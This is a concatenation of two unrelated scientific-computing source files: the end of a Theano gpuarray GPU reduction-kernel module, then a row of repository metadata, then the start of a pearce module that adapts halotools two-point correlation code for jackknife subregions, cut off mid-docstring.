%(reducebuf)s
}
}
""" % locals(), file=sio)
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (0, 1, 0) or self.reduce_mask == (1, 0):
# this kernel uses one block for each column,
# threads per block for each element per column.
# TODO: This kernel is pretty inefficient in terms of reading, because if A is
# c_contiguous (typical case) then each warp is accessing non-contigous
# memory (a segment of a column).
reducebuf = self._k_reduce_buf('Z[i0 * sZ0 + i2*sZ1]',
node, nodename, sub={})
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + i2 * sA2])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[i0 * sA0 + threadIdx.x * sA1 + i2 * sA2])")
kname = "kernel_reduce_010"
k_var = "kernel_reduce_010_" + nodename
sio = StringIO()
print("""
KERNEL void %(kname)s(
const ga_size d0, const ga_size d1, const ga_size d2,
const %(in_type)s *A, const ga_size offset_A,
const ga_ssize sA0, const ga_ssize sA1, const ga_ssize sA2,
%(out_type)s * Z, const ga_size offset_Z,
const ga_ssize sZ0, const ga_ssize sZ1)
{
const int threadCount = blockDim.x;
const int threadNum = threadIdx.x;
extern __shared__ %(acc_type)s buf[];
A = (const %(in_type)s *)(((char *)A)+offset_A);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
if (warpSize != 32)
{
return; //TODO: set error code
}
for (int i0 = blockIdx.x; i0 < d0; i0 += gridDim.x)
{
for (int i2 = blockIdx.y; i2 < d2; i2 += gridDim.y)
{
%(acc_type)s myresult = %(reduce_init)s;
for (int i1 = threadIdx.x; i1 < d1; i1 += blockDim.x)
{
%(reduce_fct)s;
}
%(reducebuf)s
}
}
}
""" % locals(), file=sio)
params = [
'uintp', 'uintp', 'uintp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp', 'intp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp'
]
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask in [(0, 1, 0), (1, 0), (1, 0, 0)]:
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(X[a * sX0 + b * sX1 + c * sX2])",
{}, True)
reduce_init = self._assign_init(load_in + "(X[a * sX0 + 0 * sX1 + c * sX2])")
kname = "kernel_reduce_010_AD"
k_var = "kernel_reduce_010_AD_" + nodename
sio = StringIO()
print("""
KERNEL void %(kname)s(
const ga_size A, const ga_size B, const ga_size C, const ga_size D,
const %(in_type)s *X, const ga_size offset_X,
const ga_ssize sX0, const ga_ssize sX1, const ga_ssize sX2,
%(out_type)s * Z, const ga_size offset_Z,
const ga_ssize sZ0, const ga_ssize sZ1)
{
const int threadCount = blockDim.x;
const int threadNum = threadIdx.x;
%(acc_type)s myresult = 0;
X = (const %(in_type)s *)(((char *)X)+offset_X);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
if (warpSize != 32)
{
return; //TODO: set error code
}
for (int a = blockIdx.x; a < A; a += gridDim.x)
{
for (int i2_D = blockIdx.y; i2_D < D; i2_D += gridDim.y)
{
int c = i2_D * 32 + threadIdx.x;
if (c < C)
{
myresult = %(reduce_init)s;
for (int b = 0; b < B; ++b)
{
%(reduce_fct)s;
}
Z[a * sZ0 + c * sZ1] = %(write_out)s(myresult);
}
}
}
}
""" % locals(), file=sio)
params = [
'uintp', 'uintp', 'uintp', 'uintp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp', 'intp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp'
]
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (0, 1, 0):
#
# This kernel is optimized when the inner most dimensions
# have the smallest stride.
# this kernel uses one block for multiple column(up to 32TODO),
# threads per block for each element per column.
# thread.x = dim 2 contiguous
# thread.y = dim 1
# block.x = dim 0
# block.y = dim 1 rest
init = self._k_init(node, nodename)
decl, kname, params, k_var = self._k_decl(node, nodename, pattern="010_inner")
reducebuf = self._k_reduce_buf_multiple('Z[i0 * sZ0 + i2*sZ1]',
node, nodename,
'blockDim.x')
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + i2 * sA2])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[i0 * sA0 + 0 * sA1 + i2 * sA2])")
sio = StringIO()
print("""
%(decl)s
{
if(warpSize<blockDim.x){
//TODO: set error code
Z[0] = -666;
return;
}
%(init)s
for (int i0 = blockIdx.x; i0 < d0; i0 += gridDim.x)
{
for (int i2 = blockIdx.y*blockDim.x+threadIdx.x; i2 < d2; i2 += gridDim.y*blockDim.x)
{
myresult = %(reduce_init)s;
for (int i1 = threadIdx.y; i1 < d1; i1 += blockDim.y)
{
%(reduce_fct)s;
}
%(reducebuf)s
}
}
}
""" % locals(), file=sio)
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (1, 1, 0):
# this kernel uses one block for each column,
# threads per block for each element per column.
# TODO: This kernel is pretty inefficient in terms of reading, because if A is
# c_contiguous (typical case) then each warp is accessing non-contigous
# memory (a segment of a column).
reducebuf = self._k_reduce_buf('Z[blockIdx.x * sZ0]', node, nodename, sub={})
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + blockIdx.x * sA2])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[blockIdx.x * sA2])")
kname = "kernel_reduce_110"
k_var = "kernel_reduce_110_" + nodename
sio = StringIO()
print("""
KERNEL void %(kname)s(
const ga_size d0, const ga_size d1, const ga_size d2,
const %(in_type)s *A, const ga_size offset_A,
const ga_ssize sA0, const ga_ssize sA1, const ga_ssize sA2,
%(out_type)s * Z, const ga_size offset_Z,
const ga_ssize sZ0)
{
const int threadCount = blockDim.x * blockDim.y;
const int threadNum = threadIdx.y * blockDim.x + threadIdx.x;
extern __shared__ %(acc_type)s buf[];
%(acc_type)s myresult = %(reduce_init)s;
A = (const %(in_type)s *)(((char *)A)+offset_A);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
if (warpSize != 32)
{
//TODO: set error code
Z[blockIdx.x * sZ0] = %(write_out)s(-666);
return;
}
for (int i0 = threadIdx.y; i0 < d0; i0 += blockDim.y)
{
for (int i1 = threadIdx.x; i1 < d1; i1 += blockDim.x)
{
%(reduce_fct)s;
}
}
%(reducebuf)s
}
""" % locals(), file=sio)
params = [
'uintp', 'uintp', 'uintp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp', 'intp',
gpuarray.GpuArray, 'uintp',
'intp'
]
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (1, 0, 0):
reducebuf = self._k_reduce_buf('Z[i1 * sZ0 + i2 * sZ1]',
node, nodename, sub={})
decl, kname, params, k_var = self._k_decl(node, nodename)
init = self._k_init(node, nodename)
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + i2 * sA2])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[i1 * sA1 + i2 * sA2])")
sio = StringIO()
print("""
%(decl)s
{
%(init)s
for (int i2 = blockIdx.y; i2 < d2; i2 += gridDim.y)
{
for (int i1 = blockIdx.x; i1 < d1; i1 += gridDim.x)
{
myresult = %(reduce_init)s;
for (int i0 = threadIdx.x; i0 < d0; i0 += blockDim.x)
{
%(reduce_fct)s
}
%(reducebuf)s
}
}
}
""" % locals(), file=sio)
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (1, 1, 1):
reducebuf = self._k_reduce_buf('Z[0]', node,
nodename, sub={})
decl, kname, params, k_var = self._k_decl(node, nodename)
init = self._k_init(node, nodename)
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + i2 * sA2])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[0])")
sio = StringIO()
print("""
%(decl)s
{
%(init)s
myresult = %(reduce_init)s;
for (int i0 = threadIdx.z; i0 < d0; i0 += blockDim.z)
{
for (int i1 = threadIdx.y; i1 < d1; i1 += blockDim.y)
{
for (int i2 = threadIdx.x; i2 < d2; i2 += blockDim.x)
{
%(reduce_fct)s;
}
}
}
%(reducebuf)s
}
""" % locals(), file=sio)
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (0, 0, 1):
# this kernel uses one block for each row,
# threads per block for each element per row.
reducebuf = self._k_reduce_buf('Z[i0 * sZ0 + i1 * sZ1]',
node, nodename, sub={})
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + i2 * sA2])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[i0 * sA0 + i1 * sA1])")
kname = "kernel_reduce_001"
k_var = "kernel_reduce_001_" + nodename
sio = StringIO()
print("""
KERNEL void %(kname)s(
const ga_size d0, const ga_size d1, const ga_size d2,
const %(in_type)s *A, const ga_size offset_A,
const ga_ssize sA0, const ga_ssize sA1, const ga_ssize sA2,
%(out_type)s * Z, const ga_size offset_Z,
const ga_ssize sZ0, const ga_ssize sZ1)
{
const int threadCount = blockDim.x;
const int threadNum = threadIdx.x;
extern __shared__ %(acc_type)s buf[];
A = (const %(in_type)s *)(((char *)A)+offset_A);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
if (warpSize != 32)
{
return; //TODO: set error code
}
for (int i0 = blockIdx.x; i0 < d0; i0 += gridDim.x)
{
for (int i1 = blockIdx.y; i1 < d1; i1 += gridDim.y)
{
%(acc_type)s myresult = %(reduce_init)s;
for (int i2 = threadIdx.x; i2 < d2; i2 += blockDim.x)
{
%(reduce_fct)s;
}
%(reducebuf)s
}
}
}
""" % locals(), file=sio)
params = [
'uintp', 'uintp', 'uintp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp', 'intp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp'
]
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (0, 0, 1, 1):
# this kernel uses one block for each row,
# threads per block for each element per row.
reducebuf = self._k_reduce_buf('Z[i0 * sZ0 + i1 * sZ1]',
node, nodename, sub={})
decl, kname, params, k_var = self._k_decl(node, nodename)
init = self._k_init(node, nodename)
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + i2 * sA2 + i3 * sA3])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[i0 * sA0 + i1 * sA1])")
sio = StringIO()
print("""
%(decl)s
{
%(init)s
for (int i0 = blockIdx.x; i0 < d0; i0 += gridDim.x)
{
for (int i1 = blockIdx.y; i1 < d1; i1 += gridDim.y)
{
%(acc_type)s myresult = %(reduce_init)s;
for (int i2 = threadIdx.y; i2 < d2; i2 += blockDim.y)
{
for (int i3 = threadIdx.x; i3 < d3; i3 += blockDim.x)
{
%(reduce_fct)s;
}
}
%(reducebuf)s
}
}
}
""" % locals(), file=sio)
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (0, 1, 0, 1):
# this kernel uses one block for each row,
# threads per block for each element per row.
reducebuf = self._k_reduce_buf('Z[i0 * sZ0 + i2 * sZ1]',
node, nodename, sub={})
decl, kname, params, k_var = self._k_decl(node, nodename)
init = self._k_init(node, nodename)
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + i2 * sA2 + i3 * sA3])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[i0 * sA0 + i2 * sA2])")
sio = StringIO()
print("""
%(decl)s
{
%(init)s
for (int i0 = blockIdx.x; i0 < d0; i0 += gridDim.x)
{
for (int i2 = blockIdx.y; i2 < d2; i2 += gridDim.y)
{
%(acc_type)s myresult = %(reduce_init)s;
for (int i1 = threadIdx.y; i1 < d1; i1 += blockDim.y)
{
for (int i3 = threadIdx.x; i3 < d3; i3 += blockDim.x)
{
%(reduce_fct)s;
}
}
%(reducebuf)s
}
}
}
""" % locals(), file=sio)
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (1, 1, 1, 1):
reducebuf = self._k_reduce_buf('Z[0]', node, nodename,
sub={})
decl, kname, params, k_var = self._k_decl(node, nodename)
init = self._k_init(node, nodename)
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + i1 * sA1 + i2 * sA2 + i3 * sA3])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[0])")
sio = StringIO()
print("""
%(decl)s
{
%(init)s
myresult = %(reduce_init)s;
for (int i0 = 0; i0 < d0; i0++)
for (int i1 = threadIdx.z; i1 < d1; i1 += blockDim.z)
{
for (int i2 = threadIdx.y; i2 < d2; i2 += blockDim.y)
{
for (int i3 = threadIdx.x; i3 < d3; i3 += blockDim.x)
{
%(reduce_fct)s;
}
}
}
%(reducebuf)s
}
""" % locals(), file=sio)
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
if self.reduce_mask == (1, 0, 1, 1) or self.reduce_mask == (1, 0, 1):
reducebuf = self._k_reduce_buf('Z[blockIdx.x*sZ0]',
node, nodename, sub={})
reduce_fct = self._assign_reduce(node, nodename, "myresult",
load_in + "(A[i0 * sA0 + blockIdx.x * sA1 + i2 * sA2 + i3 * sA3])",
{}, True)
reduce_init = self._assign_init(load_in + "(A[blockIdx.x * sA1])")
kname = "kernel_reduce_1011"
k_var = "kernel_reduce_1011_" + nodename
sio = StringIO()
print("""
KERNEL void %(kname)s(
const ga_size d0, const ga_size d1, const ga_size d2, const ga_size d3,
const %(in_type)s *A, const ga_size offset_A,
const ga_ssize sA0, const ga_ssize sA1, const ga_ssize sA2, const ga_ssize sA3,
%(out_type)s * Z, const ga_size offset_Z,
const ga_ssize sZ0)
{
const int threadCount = blockDim.x * blockDim.y * blockDim.z;
const int threadNum = threadIdx.z * blockDim.x * blockDim.y + threadIdx.y * blockDim.x + threadIdx.x;
extern __shared__ %(acc_type)s buf[];
%(acc_type)s myresult = %(reduce_init)s;
A = (const %(in_type)s *)(((char *)A)+offset_A);
Z = (%(out_type)s *)(((char *)Z)+offset_Z);
if (warpSize != 32)
{
return; //TODO: set error code
}
for (int i0 = threadIdx.z; i0 < d0; i0 += blockDim.z)
{
for (int i2 = threadIdx.y; i2 < d2; i2 += blockDim.y)
{
for (int i3 = threadIdx.x; i3 < d3; i3 += blockDim.x)
{
%(reduce_fct)s;
}
}
}
%(reducebuf)s
}
""" % locals(), file=sio)
params = [
'uintp', 'uintp', 'uintp', 'uintp',
gpuarray.GpuArray, 'uintp',
'intp', 'intp', 'intp', 'intp',
gpuarray.GpuArray, 'uintp',
'intp'
]
kernels.append(Kernel(code=sio.getvalue(), name=kname,
params=params, flags=flags, objvar=k_var))
return kernels
class GpuCAReduceCPY(GpuKernelBase, HideC, CAReduceDtype):
"""
CAReduce that reuse the python code from gpuarray.
"""
def __init__(self, scalar_op, axis=None, dtype=None, acc_dtype=None):
if not hasattr(scalar_op, 'identity'):
raise ValueError("No identity on scalar op")
CAReduceDtype.__init__(self, scalar_op, axis=axis, dtype=dtype,
acc_dtype=acc_dtype)
def __str__(self):
ax = ''
if self.axis is not None:
ax = '{%s}' % (', '.join(str(x) for x in self.axis),)
return "GpuReduce{%s}%s" % (self.scalar_op, ax)
def make_node(self, input):
ctx_name = infer_context_name(input)
res = CAReduceDtype.make_node(self, input)
input = as_gpuarray_variable(input, ctx_name)
otype = GpuArrayType(dtype=res.outputs[0].dtype,
broadcastable=res.outputs[0].broadcastable,
context_name=ctx_name)
if res.op.axis is not None:
redux = []
for i in range(len(input.type.broadcastable)):
redux.append(i in res.op.axis)
# since redux is just another way to describe what is in axis
# it doesn't need to be compared in __eq__ or __hash__
res.op.redux = redux
return Apply(res.op, [input], [otype()])
def get_params(self, node):
return node.outputs[0].type.context
def make_thunk(self, node, storage_map, compute_map, no_recycling):
# cache the kernel object
self.get_kernel_cache(node)
return super(GpuCAReduceCPY, self).make_thunk(
node, storage_map, compute_map, no_recycling)
def get_kernel_cache(self, node):
attr = '@cache_reduction_k'
if self.axis is None:
redux = [True] * node.inputs[0].ndim
else:
redux = self.redux
if not hasattr(node, attr):
acc_dtype = getattr(self, 'acc_dtype', None)
if acc_dtype is None:
acc_dtype = node.outputs[0].type.dtype
if any(redux):
setattr(node, attr, self.generate_kernel(node, acc_dtype,
redux))
if any(redux):
return getattr(node, attr)
def gpu_kernels(self, node, name):
if not any(getattr(self, 'redux', [node.inputs[0].ndim != 0])):
# Some OpenCL compilers do not accept no-arguments kernels
src = "KERNEL void reduk(GLOBAL_MEM float *a) {}"
params = ['float32']
else:
k = self.get_kernel_cache(node)
_, src, _, _ = k._get_basic_kernel(k.init_local_size,
node.inputs[0].ndim)
nd = node.inputs[0].ndim
params = ['uint32', gpuarray.GpuArray]
params.extend('uint32' for _ in range(nd))
params.append(gpuarray.GpuArray)
params.append('uint32')
params.extend('int32' for _ in range(nd))
acc_dtype = getattr(self, 'acc_dtype', None)
if acc_dtype is None:
acc_dtype = node.outputs[0].type.dtype
return [Kernel(code=src, name="reduk", params=params,
flags=Kernel.get_flags(node.inputs[0].type.dtype,
acc_dtype,
node.outputs[0].type.dtype),
objvar='k_reduk_' + name)]
def c_code(self, node, name, inp, out, sub):
if not any(getattr(self, 'redux', [node.inputs[0].ndim != 0])):
# We special case the no-reduction case since the gpu
# kernel has trouble handling it.
return """
Py_XDECREF(%(out)s);
%(out)s = pygpu_copy(%(inp)s, GA_ANY_ORDER);
if (!%(out)s) {
%(fail)s
}
if (%(sync)d)
GpuArray_sync(&%(out)s->ga);
""" % dict(out=out[0], inp=inp[0], fail=sub['fail'],
sync=bool(config.gpuarray.sync))
k = self.get_kernel_cache(node)
_, src, _, ls = k._get_basic_kernel(k.init_local_size,
node.inputs[0].ndim)
if self.axis is None:
redux = [True] * node.inputs[0].ndim
else:
redux = self.redux
acc_dtype = getattr(self, 'acc_dtype', None)
if acc_dtype is None:
acc_dtype = node.outputs[0].type.dtype
input = inp[0]
output = out[0]
nd_out = node.outputs[0].ndim
code = """
size_t gs = 1;
size_t ls;
unsigned int n = 1;
unsigned int proxy_dim[%(nd_in)s];
unsigned int proxy_off;
int proxy_str[%(nd_in)s];
void *args[%(n_args)s];
PyGpuArrayObject *tmp;
int err;
""" % dict(n_args=4 + (node.inputs[0].ndim * 2), nd_in=node.inputs[0].ndim)
if nd_out != 0:
code += """
size_t out_dims[%(nd_out)s];
int need_out = %(output)s == NULL || %(output)s->ga.nd != %(nd_out)s;
""" % dict(nd_out=nd_out, output=output)
j = 0
for i in range(node.inputs[0].ndim):
if not self.redux[i]:
code += """
out_dims[%(j)s] = %(input)s->ga.dimensions[%(i)s];
if (!need_out)
need_out |= %(output)s->ga.dimensions[%(j)s] != out_dims[%(j)s];
""" % dict(j=j, i=i, input=input, output=output)
j += 1
code += """
if (need_out) {
%(output)s = pygpu_empty(%(nd_out)s, out_dims, %(out_type)s, GA_C_ORDER, %(ctx)s, Py_None);
if (!%(output)s) {
%(fail)s
}
}
""" % dict(output=output, nd_out=nd_out, fail=sub['fail'],
ctx=sub['params'],
out_type=dtype_to_typecode(node.outputs[0].type.dtype))
else:
code += """
if (%(output)s == NULL || %(output)s->ga.nd != 0) {
Py_XDECREF(%(output)s);
%(output)s = pygpu_empty(0, NULL, %(out_type)s, GA_C_ORDER,
%(ctx)s, Py_None);
if (!%(output)s) {
%(fail)s
}
}
""" % dict(output=output, fail=sub['fail'], ctx=sub['params'],
out_type=dtype_to_typecode(node.outputs[0].type.dtype))
if acc_dtype != node.outputs[0].type.dtype:
code += """
tmp = pygpu_empty(%(output)s->ga.nd, %(output)s->ga.dimensions,
%(acc_type)s, GA_C_ORDER, %(ctx)s, Py_None);
if (!tmp) %(fail)s
""" % dict(output=output, fail=sub['fail'], ctx=sub['params'],
acc_type=dtype_to_typecode(acc_dtype))
else:
code += """
tmp = %(output)s;
Py_INCREF(tmp);
""" % dict(output=output)
# We need the proxies since we are passing a pointer to the
# data into the call and therefore we need a real copy of the
# data in the proper type.
code += """
args[0] = &n;
args[1] = tmp->ga.data;
""" % dict(output=output)
p = 2
for i in range(node.inputs[0].ndim):
code += """
proxy_dim[%(i)s] = %(input)s->ga.dimensions[%(i)s];
args[%(p)s] = &proxy_dim[%(i)s];
n *= %(input)s->ga.dimensions[%(i)s];
""" % dict(i=i, p=p, input=input)
p += 1
if not redux[i]:
code += "gs *= %(input)s->ga.dimensions[%(i)s];" % dict(input=input, i=i)
code += """
args[%(p)s] = %(input)s->ga.data;
proxy_off = %(input)s->ga.offset;
args[%(p)s+1] = &proxy_off;
""" % dict(p=p, input=input)
p += 2
for i in range(node.inputs[0].ndim):
code += """
proxy_str[%(i)s] = %(input)s->ga.strides[%(i)s];
args[%(p)s] = &proxy_str[%(i)s];
""" % dict(p=p, i=i, input=input)
p += 1
code += """
if (gs == 0) gs = 1;
n /= gs;
ls = %(ls)s;
err = GpuKernel_call(&%(k_var)s, 1, &ls, &gs, 0, args);
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: GpuCAReduceCPY: %%s.",
GpuKernel_error(&%(k_var)s, err));
%(fail)s
}
if (%(cast_out)d) {
err = GpuArray_move(&%(output)s->ga, &tmp->ga);
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: GpuCAReduceCPY [cast]: %%s.",
GpuArray_error(&tmp->ga, err));
%(fail)s
}
} else {
Py_XDECREF(%(output)s);
%(output)s = tmp;
}
if (%(sync)d) {
err = GpuArray_sync(&%(output)s->ga);
if (err != GA_NO_ERROR) {
PyErr_Format(PyExc_RuntimeError,
"gpuarray error: GpuCAReduceCPY: %%s.",
GpuKernel_error(&%(k_var)s, err));
%(fail)s
}
}
""" % dict(k_var='k_reduk_' + name, sync=bool(config.gpuarray.sync),
ls=ls, fail=sub['fail'], output=output, input=input,
cast_out=bool(acc_dtype != node.outputs[0].type.dtype))
return code
def c_code_cache_version(self):
return (2, self.GpuKernelBase_version)
def generate_kernel(self, node, odtype, redux):
if isinstance(self.scalar_op, scalar.basic.Add):
reduce_expr = "a + b"
elif isinstance(self.scalar_op, scalar.basic.Mul):
reduce_expr = "a * b"
else:
raise NotImplementedError()
return ReductionKernel(node.inputs[0].type.context, odtype,
self.scalar_op.identity, reduce_expr, redux,
arguments=[make_argument(node.inputs[0], 'a')],
init_nd=node.inputs[0].ndim)
def perform(self, node, inp, out, ctx):
input, = inp
output, = out
if self.axis is None:
redux = [True] * input.ndim
else:
redux = self.redux
if any(redux):
output[0] = self.get_kernel_cache(node)(input).astype(
copy=False, dtype=node.outputs[0].type.dtype)
else:
output[0] = pygpu.gpuarray.array(input, copy=True,
dtype=node.outputs[0].type.dtype,
context=ctx)
# To allow reloading old pickled files
GpuCAReduce = GpuCAReduceCPY
| mit | -9,199,357,860,788,290,000 | 39.339559 | 156 | 0.449773 | false | 3.62162 | false | false | false |
mclaughlin6464/pearce | pearce/mocks/tpcfSubregions.py | 1 | 21979 | """
I'm modifying the halotools tpcf code to add a few more efficincies.
One directly returns the correlation functions from subregions, so I can compute arbitary jackknifes more efficiently
Another is to add a flag for do_auto1 and do_auto2. Sometimes, you wanna compute xi_gg and xi_gm but not xi_mm!
"""
from __future__ import absolute_import, division, unicode_literals
import numpy as np
from halotools.mock_observables import *
from halotools.mock_observables.two_point_clustering import *
from halotools.mock_observables.two_point_clustering.tpcf import _tpcf_process_args, _random_counts
from halotools.mock_observables.two_point_clustering.tpcf_estimators import _TP_estimator, _TP_estimator_requirements
from halotools.mock_observables.pair_counters import npairs_jackknife_3d
from halotools.mock_observables.two_point_clustering.clustering_helpers import (process_optional_input_sample2,
verify_tpcf_estimator, tpcf_estimator_dd_dr_rr_requirements)
from halotools.mock_observables.two_point_clustering.tpcf_jackknife import \
_tpcf_jackknife_process_args,_enclose_in_box, get_subvolume_numbers, jrandom_counts
np.seterr(divide='ignore', invalid='ignore') # ignore divide by zero in e.g. DD/RR
__all__ = ['tpcf_subregions', 'tpcf']
# all lifted from duncan's code
def tpcf_subregions(sample1, randoms, rbins, Nsub=[5, 5, 5],
sample2=None, period=None, do_auto1=True, do_auto2=False, do_cross=True,
estimator='Natural', num_threads=1, seed=None, RR=None):
do_auto = do_auto1 or do_auto2
# process input parameters
function_args = (sample1, randoms, rbins, Nsub, sample2, period, do_auto,
do_cross, estimator, num_threads, seed)
sample1, rbins, Nsub, sample2, randoms, period, do_auto, do_cross, num_threads,\
_sample1_is_sample2, PBCs = _tpcf_jackknife_process_args(*function_args)
# determine box size the data occupies.
# This is used in determining jackknife samples.
if PBCs is False:
sample1, sample2, randoms, Lbox = _enclose_in_box(sample1, sample2, randoms)
else:
Lbox = period
do_DD, do_DR, do_RR = _TP_estimator_requirements(estimator)
N1 = len(sample1)
N2 = len(sample2)
NR = len(randoms)
j_index_1, N_sub_vol = cuboid_subvolume_labels(sample1, Nsub, Lbox)
j_index_2, N_sub_vol = cuboid_subvolume_labels(sample2, Nsub, Lbox)
j_index_random, N_sub_vol = cuboid_subvolume_labels(randoms, Nsub, Lbox)
# number of points in each subvolume
NR_subs = get_subvolume_numbers(j_index_random, N_sub_vol)
N1_subs = get_subvolume_numbers(j_index_1, N_sub_vol)
N2_subs = get_subvolume_numbers(j_index_2, N_sub_vol)
# number of points in each jackknife sample
N1_subs = N1 - N1_subs
N2_subs = N2 - N2_subs
NR_subs = NR - NR_subs
# calculate all the pair counts
# TODO need to modify this function
D1D1, D1D2, D2D2 = jnpair_counts(
sample1, sample2, j_index_1, j_index_2, N_sub_vol,
rbins, period, num_threads, do_auto1, do_cross, do_auto2, _sample1_is_sample2)
# pull out the full and sub sample results
if _sample1_is_sample2:
D1D1_full = D1D1[0, :]
D1D1_sub = D1D1[1:, :]
D1D2_full = D1D2[0, :]
D1D2_sub = D1D2[1:, :]
D2D2_full = D2D2[0, :]
D2D2_sub = D2D2[1:, :]
else:
if do_auto1:
D1D1_full = D1D1[0, :]
D1D1_sub = D1D1[1:, :]
if do_cross:
D1D2_full = D1D2[0, :]
D1D2_sub = D1D2[1:, :]
if do_auto2:
D2D2_full = D2D2[0, :]
D2D2_sub = D2D2[1:, :]
# do random counts
# TODO figure out what of this i can skip?
if RR is None:
D1R, RR = jrandom_counts(sample1, randoms, j_index_1, j_index_random, N_sub_vol,
rbins, period, 1, do_DR, do_RR)
else: #use the precomputed RR
D1R, RR_dummy= jrandom_counts(sample1, randoms, j_index_1, j_index_random, N_sub_vol,
rbins, period, 1, do_DR, do_RR=False)
print 'A'
if _sample1_is_sample2:
D2R = D1R
else:
if do_DR is True:
D2R, RR_dummy = jrandom_counts(sample2, randoms, j_index_2, j_index_random,
N_sub_vol, rbins, period, num_threads, do_DR, do_RR=False)
else:
D2R = None
print 'B'
if do_DR is True:
D1R_full = D1R[0, :]
D1R_sub = D1R[1:, :]
D2R_full = D2R[0, :]
D2R_sub = D2R[1:, :]
else:
D1R_full = None
D1R_sub = None
D2R_full = None
D2R_sub = None
if do_RR is True:
RR_full = RR[0, :]
RR_sub = RR[1:, :]
else:
RR_full = None
RR_sub = None
# calculate the correlation function for the subsamples
outputs = []
print 'C'
if do_auto1 or _sample1_is_sample2:
xi_11_sub = _TP_estimator(D1D1_sub, D1R_sub, RR_sub, N1_subs, N1_subs, NR_subs, NR_subs, estimator)
outputs.append(xi_11_sub)
if do_cross:
xi_12_sub = _TP_estimator(D1D2_sub, D1R_sub, RR_sub, N1_subs, N2_subs, NR_subs, NR_subs, estimator)
outputs.append(xi_12_sub)
if do_auto2:
xi_22_sub = _TP_estimator(D2D2_sub, D2R_sub, RR_sub, N2_subs, N2_subs, NR_subs, NR_subs, estimator)
outputs.append(xi_22_sub)
return outputs[0] if len(outputs) ==1 else tuple(outputs)
def tpcf(sample1, rbins, sample2=None, randoms=None, period=None,
do_auto1=True, do_cross=True, do_auto2=False, estimator='Natural', num_threads=1,
approx_cell1_size=None, approx_cell2_size=None, approx_cellran_size=None,
RR_precomputed=None, NR_precomputed=None, seed=None, n_split = 20):
r"""
Calculate the real space two-point correlation function, :math:`\xi(r)`.
Example calls to this function appear in the documentation below.
See the :ref:`mock_obs_pos_formatting` documentation page for
instructions on how to transform your coordinate position arrays into the
format accepted by the ``sample1`` and ``sample2`` arguments.
See also :ref:`galaxy_catalog_analysis_tutorial2` for example usage on a
mock galaxy catalog.
Parameters
----------
sample1 : array_like
Npts1 x 3 numpy array containing 3-D positions of points.
See the :ref:`mock_obs_pos_formatting` documentation page, or the
Examples section below, for instructions on how to transform
your coordinate position arrays into the
format accepted by the ``sample1`` and ``sample2`` arguments.
Length units are comoving and assumed to be in Mpc/h, here and throughout Halotools.
rbins : array_like
array of boundaries defining the real space radial bins in which pairs are counted.
Length units are comoving and assumed to be in Mpc/h, here and throughout Halotools.
sample2 : array_like, optional
Npts2 x 3 array containing 3-D positions of points.
Passing ``sample2`` as an input permits the calculation of
the cross-correlation function.
Default is None, in which case only the
auto-correlation function will be calculated.
randoms : array_like, optional
Nran x 3 array containing 3-D positions of randomly distributed points.
If no randoms are provided (the default option),
calculation of the tpcf can proceed using analytical randoms
(only valid for periodic boundary conditions).
period : array_like, optional
Length-3 sequence defining the periodic boundary conditions
in each dimension. If you instead provide a single scalar, Lbox,
period is assumed to be the same in all Cartesian directions.
If set to None (the default option), PBCs are set to infinity,
